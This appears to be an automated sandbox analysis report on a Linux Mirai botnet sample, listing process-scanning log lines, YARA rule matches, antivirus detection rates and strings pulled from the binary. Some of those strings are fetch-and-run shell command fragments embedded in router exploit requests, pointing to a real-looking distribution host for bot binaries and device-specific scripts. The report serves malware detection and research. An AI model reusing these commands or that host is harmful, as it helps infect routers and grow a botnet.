Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2275/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/3088/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/6195/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/6194/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1612/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1579/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1699/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1335/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1698/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2028/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1334/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1576/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2302/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/3236/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2025/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2146/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/910/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/6227/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/912/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/517/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/759/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2307/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/918/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1594/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2285/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2281/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1349/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1623/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/761/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1622/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/884/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1983/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2038/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1344/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1465/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1586/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1463/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2156/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/800/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/801/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1629/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1627/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1900/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/3021/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/491/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2294/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2050/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1877/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/772/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1633/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1599/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1632/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/774/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1477/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/654/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/896/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1476/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1872/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2048/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/655/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1475/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2289/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/777/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/656/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/657/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/4466/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/658/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/4467/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/4468/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/4469/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/4502/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/419/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/936/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1639/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1638/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2208/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2180/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1809/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1494/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1890/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2063/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2062/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1888/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1886/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/420/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1489/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/785/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1642/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/788/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/667/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/789/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1648/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/4491/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/4498/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/6158/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2078/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2077/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2074/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2195/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/670/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2746/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/793/exe	Jump to behavior

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: tknjinyyHK, type: SAMPLE
Source: Yara match	File source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: tknjinyyHK, type: SAMPLE
Source: Yara match	File source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY

Screenshots

No Screenshots

Network Map

⊘No contacted IP infos

AV Detection

Antivirus / Scanner detection for submitted sample

Source: tknjinyyHK

Avira: detected

Multi AV Scanner detection for submitted file

Source: tknjinyyHK	Virustotal: Detection: 55%	Perma Link
Source: tknjinyyHK	Metadefender: Detection: 37%	Perma Link
Source: tknjinyyHK	ReversingLabs: Detection: 69%

Machine Learning detection for sample

Source: tknjinyyHK

Joe Sandbox ML: detected

Source: tknjinyyHK	String found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
Source: tknjinyyHK	String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
Source: tknjinyyHK	String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
Source: tknjinyyHK	String found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
Source: tknjinyyHK	String found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: tknjinyyHK	String found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
Source: tknjinyyHK	String found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
Source: tknjinyyHK	String found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Source: tknjinyyHK	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: tknjinyyHK	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: tknjinyyHK	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

Malicious sample detected (through community Yara rule)

Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown

Yara signature match

Source: tknjinyyHK, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6235.1.000000000905c000.000000000905d000.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6237.1.000000000905c000.000000000905d000.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6235.1.0000000008062000.0000000008063000.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6237.1.0000000008062000.0000000008063000.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
